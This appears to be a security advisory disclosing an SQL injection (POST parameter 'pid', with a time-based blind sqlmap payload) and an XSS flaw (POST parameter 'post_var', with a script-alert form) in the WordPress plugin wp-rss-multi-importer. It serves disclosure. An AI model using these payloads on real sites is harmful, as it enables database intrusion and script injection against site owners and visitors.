1. SQL injection (rssmi_fetch_feed_items())
Method: POST
Vulnerable parameter: pid
Please note that attacker needs valid post_id (post_type == rssmi_feed and post_status == publish).
Example PHP callstack:
fetch_feeds_for_id [/wp-rss-multi-importer/inc/custom_posts.php:725]
rssmi_fetch_feed_items [/wp-rss-multi-importer/inc/import_feeds.php:217]
wpdb::get_results
Sqlmap verification:
...
Parameter: pid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pid=148 AND (SELECT * FROM (SELECT(SLEEP(5)))xVME)
...
2. XSS (save_template_function())
Method: POST
Vulnerable parameter: post_var
Verification:
<input type="text" name="save_var" value="2" />
<input type="text" name="post_var" value="<script>alert('XSS');</script>" />
<input type="submit" />
</form>
--
Regards,
Marcin Probola,